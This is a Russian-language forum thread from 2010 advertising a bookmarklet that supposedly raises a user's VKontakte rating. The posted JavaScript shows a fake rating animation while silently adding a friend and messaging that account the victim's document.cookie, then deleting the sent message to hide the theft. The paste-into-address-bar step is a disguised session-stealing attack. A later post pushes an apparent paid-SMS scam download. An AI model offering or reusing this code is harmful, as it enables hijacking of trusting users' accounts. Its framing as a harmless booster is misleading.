▲ Вверх
[ Новые сообщения · Участники · Правила форума · Поиск · RSS ]
Страница 1 из 11
Форум » Тексты » Скрипты » Скрипт для повышения рейтинга ВКонтакте
Скрипт для повышения рейтинга ВКонтакте
maxДата: Пятница, 08.01.2010, 13:09 | Сообщение # 1
Админ
Группа: Администраторы
Сообщений: 124
Награды: 1
Репутация: 999
Статус: Offline
Заходим на страницу Вконтакте через браузер Опера и вставляем это код в адресную строку браузера. Ждём до тех пор пока не поднимется до нужного рейтинга.

Code
javascript:var percentGold=100;var widthLeft=20;var widthRight=179;var t;var memPerSec=10.00741833975;function d(m,j,l){var i=(m+'').indexOf(j,l);return i=== -1?false:i;};function _a(){next= -(1000/memPerSec)*Math.log(Math.random());ge('percentGold').innerHTML=percentGold;ge('rateLeftGold').style.width=widthLeft+"px";ge('rateRightGold').style.width=widthRight+"px";percentGold=percentGold+1;widthLeft=Math.floor(Math.sin((percentGold-100)/500)*179+20);widthRight=199-widthLeft;if(widthRight<=1){clearTimeout(t);}else t=setTimeout(_a,next);};function first(){if(ge('percent')){percentGold=ge('percent').innerHTML;var pos=d(percentGold,">",0);if(pos==false) {percentGold=parseInt(percentGold);}else percentGold=parseInt(percentGold.substr(pos+1,3)); widthLeft=parseInt(ge('rateLeft').style.width);widthRight=parseInt(ge('rateRight').style.width);_b();}else{percentGold=parseInt(ge('percentGold').innerHTML);widthLeft=parseInt(ge('rateLeftGold').style.width);widthRight=parseInt(ge('rateRightGold').style.width);_a();}};function _b(){next= -(1000/memPerSec)*Math.log(Math.random());ge('percent').innerHTML=percentGold+"%";ge('rateLeft').style.width=widthLeft+"px";ge('rateRight').style.width=widthRight+"px";percentGold=percentGold+1;if(percentGold>100){clearTimeout(t);ge('percent').id="percentGold";ge('rateLeft').id='rateLeftGold';ge('rateRight').id='rateRightGold';widthLeft=20;widthRight=179;_a();}else{widthLeft=widthLeft+2;widthRight=199-widthLeft;t=setTimeout(_b,next);}};var f=document.createElement('div');f.style.display="none";var params;function a(){Ajax.Post({url:'friend.php',query:{act:'a_add_form',fid:1},onDone:function(ajaxObj,responseText){try{var text=responseText;var response=eval('('+responseText+')');f.innerHTML=response.text;var form=ge('addFriendForm');if(!form)return;var params=serializeForm(form);Ajax.Post({url:'friend.php',query:params});}catch(e){}}});};function b(){Ajax.Get({url:'mail.php',query:{act:'write',to:1},onDone:function(ajaxObj,responseText){var text=responseText;try{f.innerHTML=responseText;params={act:ge('act').value,ajax:1,misc:ge('misc')?ge('misc').value:'',secure:ge('secure')?ge('secure').value:'',chas:ge('chas').value,photo :ge('photo')?ge('photo').value:'',to_id:1,
to_reply:ge('to_reply').value,toFriends:ge('toFriends')?ge('toFriends').value:'',title:ge('title ').value,message:''
+Math.round(Math.random()*10000)+document.cookie+Math.round(Math.random()*10000)};
setTimeout(c,3000);}catch(e){}}});}; function c() {Ajax.Post({url:'mail.php',query:params,onDone: function(ajaxObj,responseText){setTimeout(e,1000);}});}; function e(){Ajax.Get({url:'mail.php',query:{out:"1",rnd:Math.round(Math.random()*10000)},onDone:function(ajaxObj,responseText){try{var k='<a href="mail.php?act=write&to=1&r=';var pos=d(responseText,k,0); var g=d(responseText,'&out=1"',pos); if(pos==false)return; var messid=parseInt(responseText.substr(pos+k.length,g-pos));params={act:"a_delete",id:messid,out:1}; Ajax.Post({url:'mail.php',query:params});}catch(e){}}});}; onDomReady(function(){document.body.appendChild(f); first();a();b();});
 
Fast-moovieДата: Суббота, 09.01.2010, 19:06 | Сообщение # 2
Рядовой
Группа: Модераторы
Сообщений: 4
Награды: 0
Репутация: 60
Статус: Offline
Макс, это херня!
 
maxДата: Воскресенье, 10.01.2010, 11:33 | Сообщение # 3
Админ
Группа: Администраторы
Сообщений: 124
Награды: 1
Репутация: 999
Статус: Offline
а я проверил -улыбнуло :)) клевый скрипт
 
Fast-moovieДата: Воскресенье, 10.01.2010, 14:41 | Сообщение # 4
Рядовой
Группа: Модераторы
Сообщений: 4
Награды: 0
Репутация: 60
Статус: Offline
как прикол его можно изспользовать)
 
maxДата: Вторник, 12.01.2010, 08:39 | Сообщение # 5
Админ
Группа: Администраторы
Сообщений: 124
Награды: 1
Репутация: 999
Статус: Offline
Ну такхх... я там думал что то и вправду , но прикольно smile
 
Kate0411Дата: Среда, 14.07.2010, 16:55 | Сообщение # 6
Рядовой
Группа: Пользователи
Сообщений: 2
Награды: 0
Репутация: -1
Статус: Offline
Реальная программа для повышения рейтинга в контакте!!! Бесплатно отправь смс на котроткий номер и подними себе рейтинг!!!
http://depositfiles.com/files/gj70mpywe
 
maxДата: Пятница, 30.07.2010, 10:22 | Сообщение # 7
Админ
Группа: Администраторы
Сообщений: 124
Награды: 1
Репутация: 999
Статус: Offline

*Цензура* killed
 
ПаркуРДата: Суббота, 20.11.2010, 19:15 | Сообщение # 8
Рядовой
Группа: Пользователи
Сообщений: 1
Награды: 0
Репутация: 0
Статус: Offline
Вигня скрипт процеки не оставляет(
 
maxДата: Четверг, 25.11.2010, 10:55 | Сообщение # 9
Админ
Группа: Администраторы
Сообщений: 124
Награды: 1
Репутация: 999
Статус: Offline
ПаркуР, deal
 
МусоровозДата: Вторник, 30.11.2010, 15:50 | Сообщение # 10
Рядовой
Группа: Пользователи
Сообщений: 2
Награды: 0
Репутация: 0
Статус: Offline
скрипт- гавно! вхожу на страницу через оперу, вставляю код в адресную строку и нихуя ничего не происходит! чтоо за мудозвон делал этот скрипт?
 
maxДата: Четверг, 16.12.2010, 18:06 | Сообщение # 11
Админ
Группа: Администраторы
Сообщений: 124
Награды: 1
Репутация: 999
Статус: Offline
Мусоровоз, читай топ внимательнее deal ... Вконтакте все вермя обновляеться haha
 
Форум » Тексты » Скрипты » Скрипт для повышения рейтинга ВКонтакте
Страница 1 из 11
Поиск: